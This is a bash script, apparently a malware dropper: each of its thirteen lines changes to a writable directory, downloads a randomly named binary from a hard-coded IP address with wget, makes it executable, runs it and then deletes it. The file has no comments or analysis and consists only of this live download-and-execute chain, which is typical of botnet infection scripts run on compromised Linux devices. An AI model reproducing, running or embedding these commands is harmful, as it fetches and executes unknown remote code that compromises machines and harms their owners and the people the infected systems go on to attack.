#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/earyzq; chmod +x earyzq; ./earyzq; rm -rf earyzq
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/cemtop; chmod +x cemtop; ./cemtop; rm -rf cemtop
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/vtyhat; chmod +x vtyhat; ./vtyhat; rm -rf vtyhat
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/vvglma; chmod +x vvglma; ./vvglma; rm -rf vvglma
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/nvitpj; chmod +x nvitpj; ./nvitpj; rm -rf nvitpj
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/razdzn; chmod +x razdzn; ./razdzn; rm -rf razdzn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/lnkfmx; chmod +x lnkfmx; ./lnkfmx; rm -rf lnkfmx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/qvmxvl; chmod +x qvmxvl; ./qvmxvl; rm -rf qvmxvl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/ajoomk; chmod +x ajoomk; ./ajoomk; rm -rf ajoomk
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/fwdfvf; chmod +x fwdfvf; ./fwdfvf; rm -rf fwdfvf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/atxhua; chmod +x atxhua; ./atxhua; rm -rf atxhua
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/qtmzbn; chmod +x qtmzbn; ./qtmzbn; rm -rf qtmzbn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://168.235.83.90/adcvds; chmod +x adcvds; ./adcvds; rm -rf adcvds
